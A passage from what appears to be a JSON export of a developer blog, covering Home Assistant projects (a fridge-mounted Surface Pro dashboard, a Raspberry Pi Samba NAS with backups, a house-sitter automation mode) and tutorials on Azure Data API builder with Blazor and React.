device, it really wants me to use a Microsoft account, but that’s not ideal - I don’t really want to setup another Microsoft account, nor do I want my account to be logged in for anyone to use! So, I created a local account with minimal permissions and I disabled the need for it to have a password or PIN on login, as it’s not like you want to be putting in a PIN constantly.\nSo I configured HASS.Agent to start on boot, logged into Home Assistant in Edge and it’s ready to go.\nDashboard on, dashboard off I know that screen burn-in isn’t really a thing like it was in the past, but that doesn’t meant that I want the screen on 24/7, at the very least, that’s not really a great use of energy. So how are we going to manage this?\nThe built-in way Conveniently, HASS.Agent has commands as a feature, which allows you to create a button/switch/etc. in HA that will do something on your device. There’s a bunch of built in ones, such as to turn the screen on and off. Success!\nWell, it would be but it wasn’t. While I’m not really sure what the underlying Windows issue is, what I have observed is that the way HASS.Agent performs the wake-up is by issuing a SendKey command (specifically using this API) that presses KEY_UP according to the source code. The problem is that when you sleep the screen with the built-in Monitor Sleep command the Surface Pro doesn’t respond to SendKey commands.\nI tried a bunch of different ways to diagnose this, including observing what the Windows Event Viewer reports at a system level on the sleep operation, but there was nothing that indicated what was wrong.\nBut there is another way in which a Windows device can sleep the screen, and that’s when you have a screen idle timeout after the duration set in the Power Management.\nWhat I observed with this is that when the screen turns off due to an idle timeout you can issue a SendKey command and wake the screen up. I did some more testing against Event Viewer to see if I could see what was different between idle timeout and sending the WM_SYSCOMMAND and I could not find anything different other than the message indicating that the screen was turned off because of idle timeout vs WM_SYSCOMMAND… so 🤷.\nThis means we’re going to need to find a different solution to managing the screen turning off.\nThe hacky way With all this knowledge we can look at a hacky solution, hack the power config settings! These settings allow you to control when the device will turn off the screen (and turn itself off) when on battery or AC power.\nWhile you’d normally do this via the Settings UI, you can also use the powercfg command line too, which means we can make a custom command in HASS.Agent to execute that. I created two commands, one that will disable the idle timeout completely and one that sets a short idle timeout:\nDisable timeout: powercfg /change monitor-sleep-ac 0 Enable timeout: powercfg /change monitor-sleep-ac 1 With these commands we’re changing monitor-sleep-ac, the idle timeout of the monitor when plugged in (which it always will be). When it’s set to 0 then it won’t timeout, otherwise it’ll timeout after 1 minute.\nAdding an automation Now that we’ve figured out how we can turn the screen on and off, it’s time to make an automation that uses these. I have an occupancy sensor in the kitchen where the dashboard is to be mounted, so I’m going to have it turn the screen on if occupancy is detected with the MonitorWake command in HASS.Agent and then disable the idle timeout, and when occupancy has been cleared for 5 minutes, enable the 1 minute timeout.\nHere’s the YAML for the two automations:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 alias: "Kitchen Dashboard: Enable sleep" description: "" trigger: - platform: state entity_id: - binary_sensor.occupancy_living_room from: "on" to: "off" for: hours: 0 minutes: 5 seconds: 0 condition: - condition: state entity_id: input_boolean.kitchen_dashboard_sleep_enabled state: "on" action: - service: button.press data: {} target: entity_id: button.kitchendashboard_enablesleep - service: input_boolean.turn_off data: {} target: entity_id: input_boolean.kitchen_dashboard_sleep_enabled mode: single alias: "Kitchen Dashboard: Wake up" description: "" trigger: - platform: state entity_id: - binary_sensor.occupancy_living_room from: "off" to: "on" condition: - condition: state entity_id: input_boolean.kitchen_dashboard_sleep_enabled state: "off" action: - service: button.press data: {} target: entity_id: button.kitchendashboard_disablesleep - service: input_boolean.turn_on data: {} target: entity_id: input_boolean.kitchen_dashboard_sleep_enabled - service: button.press data: {} target: entity_id: button.kitchendashboard_monitorwake_localuser mode: single I’ve also put in there an input_boolean helper to track if the sleep is enabled/disabled on the device, as this means that we can avoid running the wake up automation if the screen didn’t turn off - basically when occupancy was cleared but hadn’t been cleared for long enough to trigger the “enable sleep” automation.\nNow as you enter the area the screen will turn on and sleep is disabled, then when you leave the area for 5 minutes the screen will enter the idle mode.\nMounting Because of the layout of our kitchen I don’t really have any wall space to mount the tablet in a convenient location (the space I would use has two pin boards for the kids artwork, school notices, etc.), so instead I mounted it on the fridge:\nOn the back of the device I have two 3M velcro picture hanging strips, each rated to like 3kg which is probably an overkill but better safe than sorry! The reason I went with these strip type is so that I can easily remove the device if I need to attach a keyboard and do anything with it. I was considering getting some heavy-duty magnets instead and fixing them to the back, but this was a nice, cheap initial solution.\nThe power cable snakes from the side of the fridge, and since it’s on the right door of our fridge the cable only just pops out, which works well enough.\nI did mount it is just the right location that when the door of the fridge is opened it won’t hit the wall of the fridge nook… just. But you know what they say, measure once, cut twice (or something like that…).\nConclusion All in all, I’m pretty happy with how this has turned out and my wife doesn’t hate it, so, win, and it was a good way to utilise some existing hardware that I had rather than going out and purchasing a new tablet just for this.\nThe Surface Pro 4 just about the right size for our fridge, it takes up the space well without looking either too big or too small, but I can imagine that if it was on a wall it might look more out of place so if I do ever get to the point of being able to wall mount something, I’d possibly look at a different device.\nHASS.Agent is a nifty little addition and I like how well it works for what I need in controlling the device. I have some other sensors that I’ve exposed about the state of the Surface Pro, such as whether it’s charging or not, and I’m contemplating using a smart plug to control the battery charge/discharge rather than having it constantly charging, but I know that the battery of this one is not great at the moment, so I feel like it’d probably find itself going flat pretty quickly and the plug would flip-flop a lot.\nOne thing I do wish is that this was running on ethernet rather than wifi, as then I could use Wake on LAN, allowing the device the actually sleep (and thus better handle power management) but I don’t have a convenient ethernet port, plus it would look rather ugly. I explored using WoL with wifi but it doesn’t seem to work.\nIn my next post I’ll talk about the dashboard itself and what I’m doing to make something that’s better designed for the location, rather than the one I use on my phone.\n", "id": "2023-08-19-building-a-smart-home---part-13-wall-mounted-dashboards" }, { "title": "Building a Smart Home - Part 12 NAS and Backups", "url": "https://www.aaron-powell.com/posts/2023-06-22-building-a-smart-home---part-12-nas-and-backups/", "date": "Thu, 22 Jun 2023 02:01:19 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Let's setup a NAS and backups for our smart home.", "content": "It’s just over 12 months since we moved into our house and I started properly running Home Assistant and designing our smart home. In that time I’ve been lucky that nothing has really “gone wrong”, sure there have been the odd bug here and there (see my last post on debugging tips), but the system hasn’t “died”. But before we moved into this house I was experimenting with Home Assistant and wasn’t so lucky - the SD card running it died and I lost everything. I don’t want that to happen again, so I’m going to do something I’ve been putting off for a while - setup a NAS and backups.\nNAS A NAS, or Network Attached Storage, is a remote storage device that you can access over your network. It’s basically a hard drive that you can access from any device on your network. I’m going to use it to store backups of my Home Assistant instance, but also to store other files like photos and videos.\nMany people I know have a Synology NAS, and while I’m sure they are great I don’t really need much from my NAS, either in features or storage, after all, anything that is important that I’m storing is in OneDrive already, so I don’t see why I need something local with large amounts of storage. Also, neither my wife or I are really into photography, so we don’t have huge images to store, and we don’t have a huge movie collection either, that’s what streaming services are for.\nSo I decided to repurpose an old 1TB external HDD that has been sitting in a cupboard for a few years and turn it into a poor excuse for a NAS… but given it’s just a USB drive I’ll need something to connect it to that is always powered on, and for that I’ll use the Raspberry Pi that is running Pi Hole.\nWhy am I not using the one running Home Assistant? Well firstly, that wouldn’t be a NAS would it, but more importantly, I’m running HAOS and I don’t want to mess around at the OS level and risk blocking upgrades. Besides, the PiHole doesn’t do a whole lot, so it can pick up the slack.\nSetting up the NAS I’m going to use Samba to share the drive over the network, since it’s the easiest way to expose it for integration into Home Assistant (and to the Windows and Mac devices on our network).\nFirst step was the mount the USB drive in the Pi, and to do that I needed to know where the disk was to mount, which you can find with lsblk:\naaron@raspberrypi:/media $ lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT sda 8:0 1 28.7G 0 disk ├─sda1 8:1 1 256M 0 part /boot └─sda2 8:2 1 28.4G 0 part / sdb 8:16 0 931.5G 0 disk └─sdb1 8:17 0 931.5G 0 part We can see that the drive is /dev/sdb1, so it can be mounted with:\n1 sudo mount /dev/sdb1 /media/usb Next we’re going to need to ensure Samba is installed on the Pi:\n1 2 3 sudo apt update && \\ sudo apt upgrade && \\ sudo apt install samba samba-common-bin And then configure it by editing /etc/samba/smb.conf:\n[external-1] comment = 1TB External Disk path = /media/usb browsable = yes guest ok = no read only = no create mask = 0755 directory mask = 0755 write list = aaron I’ve locked down the share to require authentication, and only allow my user to write to it, so then we need to create a user for Samba:\n1 sudo smbpasswd -a aaron And finally restart the Samba service:\n1 sudo systemctl restart smbd With that, our Samba server is up and running and we have a poor excuse for a NAS!\nHandling file system permissions This was something I didn’t take into consideration, and may not be a problem for you, but since the drive was formatted on a Windows machine it was a FAT32 file system, and this posed a problem when trying to write to it via Samba - it was owned by root on the Pi, since they mounted it, and because FAT32 doesn’t support file system permissions, I couldn’t change the ownership of the files on the drive.\nTo solve this it was a matter of formatting the drive to ext4:\n1 2 3 4 sudo umount /media/usb \\ sudo mkfs.ext4 /dev/sdb1 \\ sudo mount /dev/sdb1 /media/usb \\ sudo chown -R aaron:aaron /media/usb Now the drive was mounted with the correct permissions, and I could write to it via Samba.\nIntegrating with Home Assistant In the Home Assistant 2023.6 release they added better support for network storage, meaning you can connect to a NAS via Samba or NFS natively, rather than an add-on as previously required.\nThe other advantage of this is that when you attach the storage to Home Assistant you can select the type of storage that will be used for, with one such option being backups, and that will natively integrate with Home Assistant’s backup system.\nSince I might want to use the storage for other stuff in the future, I’ve made a folder on the drive called ha-backups and specified that subpath in the storage connection.\nFrom the Backups section of Home Assistant you can change the default location for backups to be the new network storage:\nOffsite backups Having a NAS is great, but if it’s in the same physical location as your Home Assistant instance, and that location burns down, you’re still going to lose everything. Now while I’m not planning for that to happen, I’ve been in tech long enough to plan for the worst case scenario, so I’m going to setup offsite backups.\nIf you’re using a Synology or other proper NAS solution, you probably have some integrated way to ship those backups to a remote location, but we’re not that fancy, we’ve created a poor excuse for a NAS, so we’re going to need to do this ourselves.\nThankfully there’s Home Assitant add-ons that can help us, Google Drive Backup or a OneDrive version. I’m going to use the Google Drive version, since I already have a Google account that is dedicated to smart home stuff (and isolated from my personal Google account) and while my primary storage location for stuff is OneDrive, I want to keep things separated.\nThe add-on is pretty simple to setup and the instructions are pretty clear, so I won’t go into detail here, but once it’s setup you can configure it to run on a schedule, and it will automatically upload your backups to Google Drive. For me, I’m going to run it every night at 11.30pm and keep 20 days worth of backups, as my full backup size is about 550mb and there’s 15GB of storage available on the Google account, so a rolling 20 days gives me plenty of runway to restore from a backup if I need to.\nNote: It lists 9 backups that are ignored, those backups are stored locally on the Pi that Home Assistant runs on, they aren’t uploaded to Google Drive.\nConclusion This is something that I’ve been putting off for a while now. I’d played with the previous add-ons for working with Samba but always struggled with them, so I’m glad that Home Assistant has added native support for network storage, and that it’s so easy to configure, and that combining it with the Google Drive Backup add-on was easy and now I have a proper backup strategy in place… although I should probably test it at some point to make sure it actually restores… 😅\nAll in all, I probably spent about 30 minutes getting this all setup, but it took me a few days because I kept forgetting that it’s umount not unmount to unmount a disk in Linux, and then fighting with file system permissions, before realising I should just use ext4.\nShout out to Everything Smart Home for a great guide on getting everything setup and to Lars for another look at how to do it leveraging NodeRED.\n", "id": "2023-06-22-building-a-smart-home---part-12-nas-and-backups" }, { "title": "Building a Smart Home - Part 11 House Sitter Mode", "url": "https://www.aaron-powell.com/posts/2023-04-27-building-a-smart-home---part-11-house-sitter-mode/", "date": "Thu, 27 Apr 2023 00:11:23 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "It's time to go on a holiday, but what about your smart home?", "content": "When designing a smart home I’ve reiterated many times that the goal was to make it work regardless of who was there and that existing expectations of how things like switches work are maintained.\nBut naturally as you start to evolve the smart home more you will end up doing customisations around your household routines. In our house we have a few, one example is the night time routine for the kids bedrooms - at a scheduled time their light will come on, then when they flip the switch to turn it off it will also turn on their night light (there’s a few nuances to it though).\nThis kind of thing works for us and our kids, but it might not work for others, and it was something we had to tackle recently when we went on holidays and had a house sitter.\nEntre House Sitter Mode The astute reader might have noticed when I talked about smart door locks that I have a generic automation that will enable/disable a PIN for any user one of those users was called house_sitter. This is combined with a script that I have to generate a new four-digit PIN for that user.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 generate_front_door_pin: alias: Generate a random PIN description: Generate a random PIN for a specific User fields: user: description: The entity_id which the User's PIN is stored in example: input_text.lock_house_sitter_pin sequence: - alias: Randomise PIN service: input_text.set_value target: entity_id: "{{ pin_entity_id }}" data: value: "{% for n in range(4) -%}\\n {{ [0,1,2,3,4,5,6,7,8,9]|random }}\\n{%- endfor %}\\n" I have this called from another script:\n1 2 3 4 5 6 7 8 setup_front_door_house_sitter_pin: alias: Setup front door house sitter PIN description: Create a new house_sitter PIN and enable it sequence: - alias: Randomise PIN service: script.generate_front_door_pin data: pin_entity_id: input_text.lock_house_sitter_pin To use these I have added a input_boolean to indicate if we want to enable or disable the house sitter mode:\n1 2 3 4 input_boolean: house_sitter_mode: name: House Sitter Mode icon: mdi:home-account And then we have an automation that listens for the changes to its state:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 - id: "security_toggle_house_sitter_lock_access" alias: "Security: Toggle House Sitter lock access" description: "" trigger: - platform: state entity_id: - input_boolean.house_sitter_mode condition: [] action: - if: - condition: state entity_id: input_boolean.house_sitter_mode state: "on" then: - service: script.setup_front_door_house_sitter_pin data: {} else: - service: script.clear_front_door_house_sitter_pin data: {} mode: single Great, now we have a way to know within Home Assistant if we are in house sitter mode or not, and with that we can adjust our automations.\nTweaking the automations There are two approaches that I’ve tackled for this problem space and I’ll cover both of them here. The first is that we can add a condition to our automations to check if we are in house sitter mode or not, and either let the automation run or not.\nI initially went down this route for automations but I ultimately found that it wasn’t scalable, you would have a lot of automations that you add this condition to, and if you add more conditions to the automation you have to be careful that they don’t conflict with each other.\nInstead, I went down the route of creating an automation that would run when the input_boolean is triggered and then it would enable/disable the automations that I wanted to change. The idea is that you disable the automations that are unique for how your household operates, and then enable the automations that are generic and work for anyone.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 alias: "System: House sitter automation management" description: "" trigger: - platform: state entity_id: - input_boolean.home_mode_house_sitter from: "off" to: "on" - platform: state entity_id: - input_boolean.home_mode_house_sitter from: "on" to: "off" condition: [] action: - service: automation.{{ family_action }} target: entity_id: - automation.bedtime_lights_out - automation.climate_aaron_s_office - automation.climate_aaron_s_office_off - automation.lighting_kids_fan_light_switch_toggle - automation.lighting_toggle_on_switch_change - automation.system_wol_aaron_s_pc - service: automation.{{ house_sitter_action }} target: entity_id: - automation.lighting_parents_fan_house_sitter_mode - automation.lighting_parents_downlights_house_sitter - automation.security_house_sitter_arrived mode: single variables: family_action: "{{ 'turn_off' if trigger.to_state.state == 'on' else 'turn_on' }}" house_sitter_action: "{{ 'turn_on' if trigger.to_state.state == 'on' else 'turn_off' }}" The automation will look at the state of the input_boolean and generate two variables using a template to work out which service we need to call, turn_on or turn_off, and then it will call the service for the family and house sitter automations.\nI find that this approach, enable/disable automations rather than conditions, a much better option for me, as it’s easy to add more automations to the list and it’s clear when looking at the automation list in Home Assistant what is enabled and what isn’t (and that makes debugging easier!).\nConclusion This is a simple approach to managing the automations that you want to enable/disable when you are in house sitter mode, and it’s one that I’ve found works well for me. I’m sure there are other approaches that you could take, and I’d love to hear about them if you have any.\n", "id": "2023-04-27-building-a-smart-home---part-11-house-sitter-mode" }, { "title": "GraphQL on Azure: Part 14 - Using Data API builder with SWA and Blazor", "url": "https://www.aaron-powell.com/posts/2023-03-16-graphql-on-azure-part-14-using-dab-with-swa-and-blazor/", "date": "Wed, 15 Mar 2023 16:02:47 +0000", "tags": [ "azure", "graphql", "dotnet" ], "description": "We've seen how we can use DAB with SWA and React, now let's look at how we can use it with SWA and Blazor", "content": "This is the last in the three part sub-series looking at the newly launched Data API builder for Azure Databases (DAB) and while last time we looked at creating a React application, this time I wanted to look at how to do the same thing but in .NET using Blazor. So let’s jump in and learn about how to use SWA Data Connections with Blazor.\nOh, and for something different, let’s try also use a SQL backend rather than Cosmos DB.\nSetting up DAB When we’ve looked at DAB so far, we’ve had to create two files, a config for DAB and a GraphQL schema containing the types. Well since we’re using SQL this time we can drop the GraphQL schema file, as DAB will use the SQL schema to generate the types, something it couldn’t do from Cosmos DB, as it doesn’t have a schema.\nWe’ll use the same data structure, which we have a JSON file like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [ { "id": "0", "category": "Science: Computers", "type": "multiple", "difficulty": "easy", "question": "What does CPU stand for?", "correct_answer": "Central Processing Unit", "incorrect_answers": [ "Central Process Unit", "Computer Personal Unit", "Central Processor Unit" ], "modelType": "Question" } ] Let’s create a SQL table for that:\n1 2 3 4 5 6 7 USE trivia; CREATE TABLE question( id int IDENTITY(5001, 1) PRIMARY KEY, question varchar(max) NOT NULL, correct_answer varchar(max) NOT NULL, incorrect_answers varchar(max) NOT NULL CHECK ( isjson(incorrect_answers) = 1 ) ); For the incorrect_answers column, we’re specifying that it’s a JSON column, since it’d make the most sense to store it that way rather than creating another table to relate to or similar.\nNote: At the time of writing there is a bug in DAB and how it handles JSON columns - we’re going to have to deserialize it ourself: https://github.com/Azure/data-api-builder/issues/444\nThe only other things we need to change for our config file is the data-sources, so it knows we’re using mssql as the backend over Cosmos DB ()\n1 2 3 4 "data-source": { "connection-string": "<put something here>", "database-type": "mssql" } Note: The sample repo contains a VSCode devcontainer which will setup a MSSQL environment. You can connect with the local connection string: Server=sql,1433;Database=trivia;User Id=sa;Password=YourStrongPassword!;Persist Security Info=False;MultipleActiveResultSets=False;Connection Timeout=5;TrustServerCertificate=true;\nWe also need to update the source property of the Question entity to have the schema.table format that SQL uses:\n1 "source": "dbo.question", With our backend ready it’s time to focus on the frontend.\nBlazor and GraphQL When it comes to creating a GraphQL client in .NET there’s really no other choice of library to use than Strawberry Shake from Chilli Cream.\nLet’s start by creating a new Blazor WebAssembly project:\n1 dotnet new blazorwasm --name BlazorGraphQLTrivia --output frontend We’ll also need to add the Strawberry Shake NuGet package:\n1 2 3 dotnet new tool-manifest dotnet tool install StrawberryShake.Tools dotnet add frontend package StrawberryShake.Blazor The next step is going to be to generate the .NET types and associated files from our GraphQL service, but since that service is part of the local environment, we’ll need to set it up. To do that we’ll run the swa init command and generate a SWA CLI config like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 { "$schema": "https://aka.ms/azure/static-web-apps-cli/schema", "configurations": { "frontend": { "appLocation": "frontend", "outputLocation": "build", "appBuildCommand": "dotnet build", "run": "dotnet watch", "appDevserverUrl": "http://localhost:5116", "dataApiLocation": "data" } } } Then we can run the server with swa start. Now our GraphQL endpoint (and Blazor application) are up and running. You can check out the schema with Banana Cake Pop by having it navigate to http://localhost:4280/data-api/graphql. Something worth noticing is the type for Question that was generated:\n1 2 3 4 5 6 type Question { id: Int! question: String! correct_answer: String! incorrect_answers: String! } The id field is an Int!, since that matches the underlying data type in the SQL schema, and incorrect_answers is a String! since it doesn’t know the structure of the JSON column to map a GraphQL object type.\nWith the server now running, we can get Strawberry Shake to generate the .NET stuff it needs:\n1 dotnet graphql init http://localhost:4280/data-api/graphql -n TriviaClient -p ./frontend This command will add three new files to your project, a .graphqlrc.json file that contains the information for Strawberry Shake on how to connect to your GraphQL endpoint and generate types, the GraphQL schema as schema.graphql and a schema.extensions.graphql file which Strawberry Shake uses to do things such as working with custom scalars.\nNow that we have the GraphQL client generated, we can add a GraphQL operation to our application. We’ll start by adding a new page to our application, file called GetQuestions.graphql:\n1 2 3 4 5 6 7 8 9 10 query getQuestions { questions(first: 10) { items { id question correct_answer incorrect_answers } } } With a dotnet build run and passing, we can go and add the TriviaClient to the Pages/Index.razor file and query our GraphQL server. Let’s start with an @code block:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 @code { record QuestionModel(int Id, string Question, IEnumerable<string> Answers, string CorrectAnswer); private IEnumerable<QuestionModel> questions = new List<QuestionModel>(); private Dictionary<int, string> playerAnswers = new(); private string message = string.Empty; protected override async Task OnInitializedAsync() { var result = await TriviaClient.GetQuestions.ExecuteAsync(); if (result is null || result.Data is null) { return; } questions = result.Data.Questions.Items.Select(q => { var incorrectAnswers = JsonSerializer.Deserialize<List<string>>(q.Incorrect_answers); return new QuestionModel(q.Id, q.Question, Randomise(incorrectAnswers.Append(q.Correct_answer)), q.Correct_answer); }).ToList(); } public static IEnumerable<string> Randomise(IEnumerable<string> list) { var random = new Random(); return list.OrderBy(x => random.Next()).ToList(); } public void CheckAnswers() { var correctCount = 0; foreach ((int questionId, string answer) in playerAnswers) { var question = questions.First(q => q.Id == questionId); if (question.CorrectAnswer == answer) { correctCount++; } } message = $"You got {correctCount} of {questions.Count()} correct!"; } } That’s a lot of code, so let’s break it down. First we define a record type that we’ll “properly” deserialize the type into (basically unpack the JSON array for incorrect_answers) and declare some private fields to store data we need for the page. The read bulk of our integration starts in the OnInitializedAsync method:\n1 2 3 4 5 6 7 8 9 10 11 12 13 protected override async Task OnInitializedAsync() { var result = await TriviaClient.GetQuestions.ExecuteAsync(); if (result is null || result.Data is null) { return; } questions = result.Data.Questions.Items.Select(q => { var incorrectAnswers = JsonSerializer.Deserialize<List<string>>(q.Incorrect_answers); return new QuestionModel(q.Id, q.Question, Randomise(incorrectAnswers.Append(q.Correct_answer)), q.Correct_answer); }).ToList(); } Here we use the TriviaClient (which we can inject to the component with @inject TriviaClient TriviaClient at the top of the file) to call the GetQuestions method, which uses the operation we defined above to query the GraphQL server.\nOnce we get a result back it’s unpacked and turned into the QuestionModel that can be bound to the UI.\nAnd I’ll leave the rest of the exercise up to you to fill out displaying the questions and answers, but here’s how it looks in the sample application.\n.\nConclusion In this post we’ve looked at how to use Database Connections with SWA and Blazor to create a trivia game. We’ve seen how to use Database Connections to create a GraphQL client from our SQL server and how to use it in a Blazor application via the Strawberry Shake NuGet package.\nYou’ll find the sample application on my GitHub and you can learn more about how to use Database Connections on SWA through our docs.\n", "id": "2023-03-16-graphql-on-azure-part-14-using-dab-with-swa-and-blazor" }, { "title": "GraphQL on Azure: Part 13 - Using Data API builder with SWA and React", "url": "https://www.aaron-powell.com/posts/2023-03-16-graphql-on-azure-part-13-using-dab-with-swa-and-react/", "date": "Wed, 15 Mar 2023 16:01:47 +0000", "tags": [ "azure", "graphql", "javascript", "serverless" ], "description": "Want to easily create a GraphQL API for your Azure Database? Well, let's see how easy it is with SWA Database Connections.", "content": "In the last post I introduced you to a new project we’ve been working on, Data API builder for Azure Databases (DAB) and in this post I want to look at how we can use it in Azure, and that will be through one of my favourite Azure services, Azure Static Web Apps, for you see, as part of the announcement today of DAB, we’ve announced that it is available as a feature of SWA (called Database Connections), so let’s build a React app!\nLocal Development One of the neat things about working with SWA is that we have a CLI tool which emulates the functionality of SWA, and with today’s announcement, we can use it to emulate the Database Connections feature, so let’s get started. First off, we need to ensure we have the latest version of the CLI installed, so let’s run the following command:\n1 npm install -g @azure/static-web-apps-cli@latest For the Database Connections, we’ll use the same configuration that we had in the last post, so let’s copy the dab-config.json and schema.graphql into the data folder of our repo, and rename the dab-config.json to staticwebapp.database.config.json. Next, I’m going to scaffold out a new React app (using Vite), so let’s run the following command:\n1 npx create-vite frontend --template react-ts Lastly, we’ll initialise the SWA CLI:\n1 swa init Follow the prompts and adjust any of the values you require (the default Vite template uses npm run dev for the dev server but the SWA CLI init will want to use npm start, so you’ll need to adjust one of those values). When completed, you should have a swa-cli.config.json like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 { "$schema": "https://aka.ms/azure/static-web-apps-cli/schema", "configurations": { "dab": { "appLocation": "frontend", "outputLocation": "build", "appBuildCommand": "npm run build", "run": "npm run dev", "appDevserverUrl": "http://localhost:5173", "dataApiLocation": "data" } } } Notice the last line, "dataApiLocation": "data", this is the location of the folder that contains the schema.graphql and staticwebapp.database.config.json files which are going to be used by the Database Connections feature. Now, let’s start the SWA CLI:\n1 swa start Once the CLI has started you can browse the GraphQL schema in your choice of IDE by providing it with the address http://localhost:4280/data-api/graphql.\nBuilding a React application It’s time to build the React application, I won’t cover all the details (you’ll find the full example on my GitHub), instead I’ll focus on the GraphQL integration.\nSince we have a TypeScript application, we can adapt the pattern I discussed in part 5 on type-safe GraphQL, using GraphQL Code Generator to generate the types for us. To do this, we’ll need to install the following packages to the frontend project:\n1 npm install -D @graphql-codegen/cli We’ll then initialise the GraphQL Code Generator:\n1 npx graphql-code-generator init Follow the setup guide to create the config file like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import type { CodegenConfig } from "@graphql-codegen/cli"; const config: CodegenConfig = { overwrite: true, schema: "http://localhost:4280/data-api/graphql", documents: ["src/**/*.tsx", "src/**/*.ts"], generates: { "src/gql/": { preset: "client", plugins: [], }, }, }; export default config; Great, we’re almost ready to go, the last thing we’re going to need is a GraphQL client, and for that, we’ll use Apollo Client, so let’s install that:\n1 npm install @apollo/client graphql Integrating GraphQL It’s time to integrate GraphQL into our application, and I’m going to do that by creating a useQuestions hook, which will return the questions from the database. First, let’s create the hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import { graphql } from "./gql/gql"; import { useQuery } from "@apollo/client"; import { useEffect, useState } from "react"; const getQuestionsDocument = graphql(/* GraphQL */ ` query getQuestions { questions(first: 10) { items { id question correct_answer incorrect_answers } } } `); This might error at the moment as the graphql function doesn’t exist, which is to be expected as we haven’t generated it yet via the GraphQL Code Generator. Let’s do that now:\n1 npm run codegen This assumes that the codegen script is in the package.json file, if not, you’ll need to run npx graphql-codegen instead.\nWith the error sorted, let’s continue with the hook. Initially we’ve defined the GraphQL query in the getQuestionsDocument variable, and then we’ve used the graphql function create a TypedDocumentNode which is the type that Apollo Client expects. Next, we’ll use the useQuery hook to execute the query, and then we’ll return the data from the query:\n1 2 3 export const useQuestions = () => { const { data, loading } = useQuery(getQuestionsDocument); }; Admittedly, we could just return the data.questions.items from the hook, but I don’t want to do that because the data structure contains two fields I’d prefer to merge, correct_answer and incorrect_answers, so that we can shuffle the answers in a random way and then have the application only know about all the answers as a single array. To do this, we’ll use the useEffect hook to merge the data, and then we’ll return the merged data:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 export type QuestionModel = Omit< GetQuestionsQuery["questions"]["items"][0], "incorrect_answers" > & { answers: string[]; }; export const useQuestions = () => { const { data, loading } = useQuery(getQuestionsDocument); const [questions, setQuestions] = useState<QuestionModel[] | undefined>( undefined ); useEffect(() => { if (data) { setQuestions( data?.questions.items.map((question) => ({ id: question.id, question: question.question, correct_answer: question.correct_answer, answers: arrayRandomizer( question.incorrect_answers.concat(question.correct_answer) ), })) ); } }, [data]); return { questions, loading }; }; Since the questions that we return will have some of the same fields as the object returned from the original GraphQL query, we may as well use the Omit type to remove the incorrect_answers field from the QuestionModel type. We can then add the answers field to the type, which is an array of strings that contains the correct_answer and the incorrect_answers shuffled in a random order.\nNow all that’s left is to add the Apollo Client provider to our React application:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import { ApolloClient, ApolloProvider, InMemoryCache } from "@apollo/client"; import React from "react"; import ReactDOM from "react-dom/client"; import App from "./App"; import "./index.css"; const client = new ApolloClient({ uri: `/data-api/graphql/`, cache: new InMemoryCache(), }); ReactDOM.createRoot(document.getElementById("root") as HTMLElement).render( <React.StrictMode> <ApolloProvider client={client}> <App /> </ApolloProvider> </React.StrictMode> ); And then use the hook in the App component (I’ll omit that for brevity, you can check it out in the GitHub repo). But with it all configured, here’s how it looks:\nConclusion In this post we’ve taken a look at how we can use the new Database Connections feature of Azure Static Web Apps to connect to a Cosmos DB database and expose it as a GraphQL endpoint, without having to write the server ourself. We’ve also seen that this can be done entirely via the local emulator for SWA, allowing us to rapidly iterate over the application without having to deploy it each time.\nWhile we didn’t go through the deployment aspect in this post specifically, you can learn how to do that through our docs.\n", "id": "2023-03-16-graphql-on-azure-part-13-using-dab-with-swa-and-react" }, { "title": "GraphQL on Azure: Part 12 - GraphQL as a Service", "url": "https://www.aaron-powell.com/posts/2023-03-16-graphql-on-azure-part-12-graphql-as-a-service/", "date": "Wed, 15 Mar 2023 16:00:47 +0000", "tags": [ "azure", "graphql", "javascript", "dotnet" ], "description": "It's never been easier to create a GraphQL server on Azure, let's check out what's new", "content": "\nI’m really excited because today we launched the first public preview of Data API builder for Azure Databases or DAB for short (the official name is a bit of a mouthful 😅).\nThe important links you’ll need are:\nSQL announcement Cosmos announcement Docs SWA integration announcement GitHub Repo What is DAB DAB is a joint effort from the Azure SQL, PostgreSQL, MySQL and Cosmos DB teams to provide a simple and easy way to create REST and GraphQL endpoints from your existing database. Now obviously this is something that you’ve always been able to do, but the difference is that DAB does it for you (after all, that’s the point of this series 😜) so rather than having to write an ASP.NET application, data layer, authentication and authorisation, and so on, DAB will do all of that for you. Essentially, DAB is a Backend as a Service (BaaS) and this makes it easier to create an application over a database by removing the need to create the backend yourself.\nQuick note: DAB doesn’t support REST for Cosmos DB as Cosmos DB already has a REST API.\nHow does DAB work DAB is going to need a data schema that describes the entities you want to expose. In the case of a SQL backend, DAB will inspect the database schema and allow you to expose the tables, views and stored procedures as endpoints. With a NoSQL backend (currently Cosmos DB NoSQL) you need to provide a set of GraphQL types which define the entities you want expose, since there’s no database schema to work from.\nYou’ll also provide DAB with a config file which acts as a mapping between the data schema and how you want those entities exposed. In the config file you’ll define entities you want to expose (so you can pick and choose what you want to expose from the available schema), access control and entity relationships. If you’re working with a SQL database and have views or stored procedures, you can define how they will be exposed.\nWith this information DAB will then generate the appropriate REST endpoints for each entity with REST semantics on how CRUD should work, as well as a full GraphQL schema, including queries for individual items, paginated lists (with filtering) and mutations (create, update and delete).\nYour first DAB instance Sounds cool doesn’t it? Well, let’s go ahead and make a DAB server. The first thing we’ll need to do is 